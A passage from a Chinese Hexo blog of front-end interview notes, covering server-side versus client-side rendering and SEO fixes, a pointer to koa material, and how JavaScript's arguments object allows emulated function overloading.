26网页渲染模式—服务端渲染和客户端渲染<br><ol><br>  <li>服务端渲染(后端渲染<b>SSR</b>):后端渲染HTML的情况下，浏览器就是直接呈现出经服务器计算处理的HTML代码，这里的计算处理就是服务器经过解析存在服务器端的模板文件来完成的。在这种情况下，浏览器只进行了HTML的解析，以及通过操作系统提供的操纵显示器显示内容的系统调用在显示器上把HTML所代表的图像显示给用户。<br><br>&gt;<b>好处:前端耗时少(因为前端只负责将HTML进行展示)，利于SEO<br>&gt;坏处:网络传输量大，占用(部分、少部分)服务器运算资源，response出的数据会大些，模板改了前端的交互和样式之类的东西也要跟着联动修改</b><br>  </li><li>客户端渲染(前端渲染CSR)——SPA—单页面应用:前端渲染就是指浏览器会从后端得到一些信息，将这些信息组织排列形成最终可读的HTML字符串是由浏览器来完成的，在形成了HTML字符串之后，再进行显示。<br><br>&gt;<b>好处：网络传输数据量小（减少了服务器压力）<br>&gt;坏处：前端耗时较多，不利于SEO</b><br>  </li><li>解决seo的方案一般有三种<br>    <ol><br>      <li>页面预渲染<br>      </li><li>服务端渲染<br>      </li><li>路由采用H5 History<br>    </li></ol><br>  </li><li>技术上常用的有四个<br>    <ol><br>      <li>ssr: <code>https://cn.vuejs.org/v2/guide/ssr.html</code><br>      </li><li>vue-meta-info: <code>https://zhuanlan.zhihu.com/p/29148760</code><br>      </li><li>nuxt(简单易用):<a href="https://zh.nuxtjs.org/guide/installation" target="_blank" rel="noopener">https://zh.nuxtjs.org/guide/installation</a><br>      </li><li>phantomjs页面预渲染 phantomjs.org<br>    </li></ol><br></li></ol>

<h4 id="27-关于koa的知识可以看视频的源代码和课件"><a href="#27-关于koa的知识可以看视频的源代码和课件" class="headerlink" title="27.关于koa的知识可以看视频的源代码和课件"></a>27.关于koa的知识可以看视频的源代码和课件</h4><h4 id="28-函数重载："><a href="#28-函数重载：" class="headerlink" title="28.函数重载："></a>28.函数重载：</h4><blockquote>
<h5 id="ECMAScript函数参数在内部是用一个数组来表示的，函数接收到的始终都是这个数组，而不关心这个数组中包含哪些参数。实际上，在函数体内可以通过arguments对象来访问这个参数数组，从而获取传递给函数的每一个参数。函数的一个重要特点：命名的参数只是提供来便利，但不是必需的。arguments的值永远与对应命名参数的值保持同步，但是它们两个之间的内存空间是相互独立的，只不过值同步而已。另外，假如函数只传入了一个参数，那么arguments-1-设置的值不会反映到命名参数中，因为arguments对象的长度是由传入的参数个数决定的，不是由定义函数时的命名参数的个数决定的。"><a href="#ECMAScript函数参数在内部是用一个数组来表示的，函数接收到的始终都是这个数组，而不关心这个数组中包含哪些参数。实际上，在函数体内可以通过arguments对象来访问这个参数数组，从而获取传递给函数的每一个参数。函数的一个重要特点：命名的参数只是提供来便利，但不是必需的。arguments的值永远与对应命名参数的值保持同步，但是它们两个之间的内存空间是相互独立的，只不过值同步而已。另外，假如函数只传入了一个参数，那么arguments-1-设置的值不会反映到命名参数中，因为arguments对象的长度是由传入的参数个数决定的，不是由定义函数时的命名参数的个数决定的。" class="headerlink" title="ECMAScript函数参数在内部是用一个数组来表示的，函数接收到的始终都是这个数组，而不关心这个数组中包含哪些参数。实际上，在函数体内可以通过arguments对象来访问这个参数数组，从而获取传递给函数的每一个参数。函数的一个重要特点：命名的参数只是提供来便利，但不是必需的。arguments的值永远与对应命名参数的值保持同步，但是它们两个之间的内存空间是相互独立的，只不过值同步而已。另外，假如函数只传入了一个参数，那么arguments[1]设置的值不会反映到命名参数中，因为arguments对象的长度是由传入的参数个数决定的，不是由定义函数时的命名参数的个数决定的。"></a>ECMAScript函数参数在内部是用一个数组来表示的，函数接收到的始终都是这个数组，而不关心这个数组中包含哪些参数。实际上，在函数体内可以通过arguments对象来访问这个参数数组，从而获取传递给函数的每一个参数。函数的一个重要特点：命名的参数只是提供来便利，但不是必需的。arguments的值永远与对应命名参数的值保持同步，但是它们两个之间的内存空间是相互独立的，只不过值同步而已。另外，假如函数只传入了一个参数，那么arguments[1]设置的值不会反映到命名参数中，因为arguments对象的长度是由传入的参数个数决定的，不是由定义函数时的命名参数的个数决定的。</h5></blockquote>
<blockquote>
<h5 id="ECMAScript函数不能像传统意义上那样实现重载。如果定义了两个名字相同的函数，该名字只属于后定义的函数。不过，通过检查传入函数中参数的类型和数量并作出不同的反应，可以模仿方法的重载。《高程第三版》66页"><a href="#ECMAScript函数不能像传统意义上那样实现重载。如果定义了两个名字相同的函数，该名字只属于后定义的函数。不过，通过检查传入函数中参数的类型和数量并作出不同的反应，可以模仿方法的重载。《高程第三版》66页" class="headerlink" title="ECMAScript函数不能像传统意义上那样实现重载。如果定义了两个名字相同的函数，该名字只属于后定义的函数。不过，通过检查传入函数中参数的类型和数量并作出不同的反应，可以模仿方法的重载。《高程第三版》66页"></a>ECMAScript函数不能像传统意义上那样实现重载。如果定义了两个名字相同的函数，该名字只属于后定义的函数。<font color="red">不过，通过检查传入函数中参数的类型和数量并作出不同的反应，可以模仿方法的重载。《高程第三版》66页</font></h5></blockquote>
</li></ol>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/01/22/坚持打卡第一天/" rel="next" title="坚持打卡第一天">
                <i class="fa fa-chevron-left"></i> 坚持打卡第一天
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">John Doe</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">29</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-同源的定义：端口，协议，域名都一致。"><span class="nav-number">1.</span> <span class="nav-text">1.同源的定义：端口，协议，域名都一致。</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-VUE的响应式原理：例如：Vue的一个实例对象a，其中有一个属性a-b，那么在实例化的过程中，通过Object-defineProperyu-会对a-b添加getter和setter，同时Vue-js会对模版进行编译，解析生成一个指令对象（这里是v-text指令），每个指令对象都会关联一个Watcher。当a-b求值的时候，就会触发它的getter，当修改a-b的值的时候，就会触发它的setter，同时会通知被关联的Watcher，然后Wactcher就会再次对a-b求值，计算对比新旧值，当值改变了，Watcher就会通知到指令，调用指令的upadta-方法，由于指令是对DOM的封装，所以就会调用DOM的原生方法去更新视图，这样就完成了数据改变到视图更新的一个自动过程。"><span class="nav-number">2.</span> <span class="nav-text">2.VUE的响应式原理：例如：Vue的一个实例对象a，其中有一个属性a.b，那么在实例化的过程中，通过Object.defineProperyu()会对a.b添加getter和setter，同时Vue.js会对模版进行编译，解析生成一个指令对象（这里是v-text指令），每个指令对象都会关联一个Watcher。当a.b求值的时候，就会触发它的getter，当修改a.b的值的时候，就会触发它的setter，同时会通知被关联的Watcher，然后Wactcher就会再次对a.b求值，计算对比新旧值，当值改变了，Watcher就会通知到指令，调用指令的upadta()方法，由于指令是对DOM的封装，所以就会调用DOM的原生方法去更新视图，这样就完成了数据改变到视图更新的一个自动过程。</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-计算属性-Vue生命周期：看官方文档或者“https-blog-csdn-net-smartdt-article-details-75557369”"><span class="nav-number">3.</span> <span class="nav-text">3.计算属性+Vue生命周期：看官方文档或者“https://blog.csdn.net/smartdt/article/details/75557369”</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-关于http可以看自己的hexo博客-http简单来说是一个应用层协议，http默认端口是80；"><span class="nav-number">4.</span> <span class="nav-text">4.关于http可以看自己的hexo博客/http简单来说是一个应用层协议，http默认端口是80；</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5-https：通俗来说，https就是http的加密，并且其采用对称加密方法：这是一种最快速，最简单的一种加密方法，采用单钥密码系统的加密方法，同一个密钥可以同时用作信息的加密和解密，对称加密是用一个密钥来解密的。（具体看第六点）"><span class="nav-number">5.</span> <span class="nav-text">5.https：通俗来说，https就是http的加密，并且其采用对称加密方法：这是一种最快速，最简单的一种加密方法，采用单钥密码系统的加密方法，同一个密钥可以同时用作信息的加密和解密，对称加密是用一个密钥来解密的。（具体看第六点）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#6-SSL协议：SSL是保证服务器和客户端安全通信的一种协议，简单来说，就是对传输信息进行加密保证安全的协议。HTTP报文通过SSL的加解密变成了安全的https。然后来看看证书：证书可以简单看成网站在网络中的身份证，每次访问某个网站的时候，其实我们都会检查它的身份证是否可靠。证书除了验证身份可靠外，还参与了SSL会话建立的过程。"><span class="nav-number">6.</span> <span class="nav-text">6.SSL协议：SSL是保证服务器和客户端安全通信的一种协议，简单来说，就是对传输信息进行加密保证安全的协议。HTTP报文通过SSL的加解密变成了安全的https。然后来看看证书：证书可以简单看成网站在网络中的身份证，每次访问某个网站的时候，其实我们都会检查它的身份证是否可靠。证书除了验证身份可靠外，还参与了SSL会话建立的过程。</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#7-gulp：”https-www-gulpjs-com-cn-quot"><span class="nav-number">7.</span> <span class="nav-text">7.gulp：”https://www.gulpjs.com.cn/&quot;</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#8-new-new关键字做了5件事情："><span class="nav-number">8.</span> <span class="nav-text">8.new:new关键字做了5件事情：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#9-原型："><span class="nav-number">9.</span> <span class="nav-text">9.原型：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#10-delete和Vue-delete删除数组的区别"><span class="nav-number">10.</span> <span class="nav-text">10.delete和Vue.delete删除数组的区别</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#11-其实深拷贝和浅拷贝都是针对的引用类型，JS中的变量类型分为值类型（基本类型）和引用类型；对值类型进行复制操作会对值进行一份拷贝，而对引用类型进行复制，则会进行地址的拷贝，最终两个变量指向同一份数据。深拷贝的话有可能导致爆栈（因为有用递归），破解方法：https-segmentfault-com-a-1190000016672263（md，现在真的看不懂，不开玩笑，还是看视频去了）"><span class="nav-number">11.</span> <span class="nav-text">11.其实深拷贝和浅拷贝都是针对的引用类型，JS中的变量类型分为值类型（基本类型）和引用类型；对值类型进行复制操作会对值进行一份拷贝，而对引用类型进行复制，则会进行地址的拷贝，最终两个变量指向同一份数据。深拷贝的话有可能导致爆栈（因为有用递归），破解方法：https://segmentfault.com/a/1190000016672263（md，现在真的看不懂，不开玩笑，还是看视频去了）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#12-nginx"><span class="nav-number">12.</span> <span class="nav-text">12.nginx:</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#13-http状态码"><span class="nav-number">13.</span> <span class="nav-text">13.http状态码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#14-vertical-align-”inline-block依赖性元素”，只有一个元素属于inline或者是inline-block-table-cell也可以理解为inline-block水平-水平，其身上的vertical-align属性才可以起作用。"><span class="nav-number">14.</span> <span class="nav-text">14.vertical-align:”inline-block依赖性元素”，只有一个元素属于inline或者是inline-block(table-cell也可以理解为inline-block水平)水平，其身上的vertical-align属性才可以起作用。</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#15-前端的安全性：XSS和CSRF"><span class="nav-number">15.</span> <span class="nav-text">15.前端的安全性：XSS和CSRF</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#16-CSRF-跨站请求伪造-XSRF"><span class="nav-number">16.</span> <span class="nav-text">16.CSRF(跨站请求伪造/XSRF)</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#17-TCP三次握手与四次挥手"><span class="nav-number">17.</span> <span class="nav-text">17 TCP三次握手与四次挥手</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#18-Socket"><span class="nav-number">18.</span> <span class="nav-text">18 Socket</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#19-HTTP1-0与1-1的区别"><span class="nav-number">19.</span> <span class="nav-text">19 HTTP1.0与1.1的区别</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#20-HTTP1-x与2-0的区别"><span class="nav-number">20.</span> <span class="nav-text">20 HTTP1.x与2.0的区别</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#21-更多网络知识尽在："><span class="nav-number">21.</span> <span class="nav-text">21 更多网络知识尽在：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#22-PWA-CGO面试有-："><span class="nav-number">22.</span> <span class="nav-text">22.PWA(CGO面试有)：</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#大致就上面那些，了解一下，更多的话看：https-blog-csdn-net-weixin-33716154-article-details-88177463"><span class="nav-number">22.1.</span> <span class="nav-text">大致就上面那些，了解一下，更多的话看：https://blog.csdn.net/weixin_33716154/article/details/88177463</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#23-MVC由Model，View，Controller-Controller是MVC体系架构的核心部分-三部分组成。Controller中包含后台代码逻辑，View是ASPX，如纯HTML代码，Model是中间层。MVC的改变有两点，View变成简单的HTML，后台代码移到-NET类中，称为控制器-以下是ASP-NET-MVC请求流通用步骤-Model和Controller相连，View跟Controller相连"><span class="nav-number">23.</span> <span class="nav-text">23.MVC由Model，View，Controller(Controller是MVC体系架构的核心部分)三部分组成。Controller中包含后台代码逻辑，View是ASPX，如纯HTML代码，Model是中间层。MVC的改变有两点，View变成简单的HTML，后台代码移到.NET类中，称为控制器.以下是ASP.NET MVC请求流通用步骤(Model和Controller相连，View跟Controller相连)</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#看到MVC不得不提一下VUE中的的MVVM："><span class="nav-number">23.1.</span> <span class="nav-text">看到MVC不得不提一下VUE中的的MVVM：</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#27-关于koa的知识可以看视频的源代码和课件"><span class="nav-number">24.</span> <span class="nav-text">27.关于koa的知识可以看视频的源代码和课件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#28-函数重载："><span class="nav-number">25.</span> <span class="nav-text">28.函数重载：</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#ECMAScript函数参数在内部是用一个数组来表示的，函数接收到的始终都是这个数组，而不关心这个数组中包含哪些参数。实际上，在函数体内可以通过arguments对象来访问这个参数数组，从而获取传递给函数的每一个参数。函数的一个重要特点：命名的参数只是提供来便利，但不是必需的。arguments的值永远与对应命名参数的值保持同步，但是它们两个之间的内存空间是相互独立的，只不过值同步而已。另外，假如函数只传入了一个参数，那么arguments-1-设置的值不会反映到命名参数中，因为arguments对象的长度是由传入的参数个数决定的，不是由定义函数时的命名参数的个数决定的。"><span class="nav-number">25.1.</span> <span class="nav-text">ECMAScript函数参数在内部是用一个数组来表示的，函数接收到的始终都是这个数组，而不关心这个数组中包含哪些参数。实际上，在函数体内可以通过arguments对象来访问这个参数数组，从而获取传递给函数的每一个参数。函数的一个重要特点：命名的参数只是提供来便利，但不是必需的。arguments的值永远与对应命名参数的值保持同步，但是它们两个之间的内存空间是相互独立的，只不过值同步而已。另外，假如函数只传入了一个参数，那么arguments[1]设置的值不会反映到命名参数中，因为arguments对象的长度是由传入的参数个数决定的，不是由定义函数时的命名参数的个数决定的。</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#ECMAScript函数不能像传统意义上那样实现重载。如果定义了两个名字相同的函数，该名字只属于后定义的函数。不过，通过检查传入函数中参数的类型和数量并作出不同的反应，可以模仿方法的重载。《高程第三版》66页"><span class="nav-number">25.2.</span> <span class="nav-text">ECMAScript函数不能像传统意义上那样实现重载。如果定义了两个名字相同的函数，该名字只属于后定义的函数。不过，通过检查传入函数中参数的类型和数量并作出不同的反应，可以模仿方法的重载。《高程第三版》66页</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
